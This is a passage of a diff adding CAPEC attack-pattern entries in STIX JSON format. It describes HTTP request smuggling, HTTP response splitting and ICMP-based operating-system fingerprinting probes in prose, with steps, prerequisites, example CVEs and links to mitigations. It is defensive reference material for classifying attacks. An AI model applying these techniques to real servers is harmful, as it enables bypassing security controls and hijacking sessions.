"attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n When using Haproxy 1.5.3 version as front-end proxy server with with Node.js version 14.13.1 or 12.19.0 as the back-end web server it is possible to use two same header fields for example: two Transfer-Encoding, Transfer-Encoding: chunked and Transfer-Encoding: chunked-false, to bypass Haproxy /flag URI restriction and receive the Haproxy flag value, since Node.js identifies the first header but ignores the second header. See also: CVE-2020-8287\n ", + "\n When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. 
See also: CVE-2006-6276\n ", + "\n Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both \"Content-Length\" and a \"Transfer-Encoding: chunked\" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with \"Transfer-Encoding: chunked\" header without replacing the existing \"Content-Length\" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with \"Content-Length: 0\". See also: CVE-2005-2088\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.

  2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

  3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize various combinations of HTTP Headers within a single HTTP Request such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded requests or data in the body of the original request are unprocessed and treated as part of subsequent requests by the intended target HTTP agent.\n From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences.\n \n For CL;TE and TE;CL HTTP header combinations, the first HTTP agent, in the HTTP message path that receives the HTTP request, takes precedence or only processes one header but not the other, while the second/final HTTP agent processes the opposite header, allowing for embedded HTTP requests to be ignored and smuggled to the intended target HTTP agent.\n For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation (see Mitigations for details) of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP requests to be smuggled. .\n \n
    \n Construct a very large HTTP request using multiple Content-Length headers of various data lengths that can potentially cause subsequent requests to be ignored by an intermediary HTTP agent (firewall) and/or eventually parsed separately by the target HTTP agent (web server).\n Note that most modern HTTP infrastructure reject HTTP requests with multiple Content-Length headers.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Request Smuggling attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

  2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n A maliciously crafted HTTP request, which contains a second secretly embedded HTTP request is interpreted by an intermediary web proxy as single benign HTTP request, is forwarded to a back-end server, that interprets and parses the HTTP request as two authorized benign HTTP requests bypassing security controls.\n This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]\n Additionally this attack can be performed through modification and/or fuzzing of parameters composing the request-line of HTTP messages.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.\n This differs from CAPEC-273 HTTP Response Smuggling, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. 
HTTP Request Smuggling is an attempt to compromise aback-end HTTP agentvia HTTP Request messages.\n HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974" + ], + "x_capec_prerequisites": [ + "An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of crafting malicious HTTP messages and monitoring HTTP message responses." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6100503-6f80-4635-b9dd-c9d1788158b5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad42c576-3139-4cee-ab82-749f0c506f57", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--77b0b8cc-d674-4ba6-979e-cae5adc89a5c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5aa2cd65-f8bc-45da-a757-06ea485a0d3e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d84e072-1001-4113-b462-004ab68ea8da", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ea59df1-f9e8-49e5-9fb1-39d689fd42cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78d6512c-86fb-4c96-b8f0-bebd67b26ece", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9475a8b1-13bc-4b75-b6b8-af4040ec7469", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ec4cb3d-85a3-4f13-b540-d74a0a2024e1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8357749-6d25-4561-9c20-f8f937fb10f0", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--82300401-dfdb-4a55-b612-2e17989ee4ec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bf4c2215-7fc8-46bd-9caf-9f6fc4c1c877", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d07b5f41-bbd9-40f6-bd22-173bd6398815", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target 
and then analyze the integrity of data returned or \"Quoted\" from the originating request that generated the error message.", + "external_references": [ + { + "external_id": "CAPEC-330", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--420d73c3-133c-487e-a98a-6050e7680243", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Echoing Integrity Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide 
Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP packet to a closed port on the target machine to solicit an IP Header's total length field value within the echoed 'Port Unreachable\" error message. 
This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses.", + "external_references": [ + { + "external_id": "CAPEC-331", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/331.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. 
Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--d9629af2-d5c2-4198-b80f-281cc7d04422", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP Total Length Field Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. 
There are four general response types that can be used to distinguish operating systems apart: 1) the IP total length field may be calculated correctly, 2) an operating system may add 20 or more additional bytes to the length calculation, 3) the operating system may subtract 20 or more bytes from the correct length of the field or 4) the IP total length field is calculated with any other incorrect value.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. This allows the attacker to construct a fingerprint of specific OS behaviors.", + "external_references": [ + { + "external_id": "CAPEC-332", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/332.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. 
Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP 'ID' Field Error Message Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. 
There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-34", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/34.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": 
"CWE-436", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html" + }, + { + "description": "HTTP Response Splitting", + "external_id": "25", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Response-Splitting" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Response Splitting, 2010, The Web Application Security Consortium", + "external_id": "REF-680", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting" + } + ], + "id": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Response Splitting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + 
], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. See also: CVE-2006-0207\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets

  2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data (in the form of HTTP headers with custom strings and embedded web scripts and objects) into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP responses by intermediary and front-end client/victim HTTP agents. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses to intermediary and front-end client/victim HTTP agents, will be observed to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

  3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:\n \n additional HTTP Requests with their own headers\n malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)\n adversary chosen encoding (e.g., UTF-7)\n \n to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.\n Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

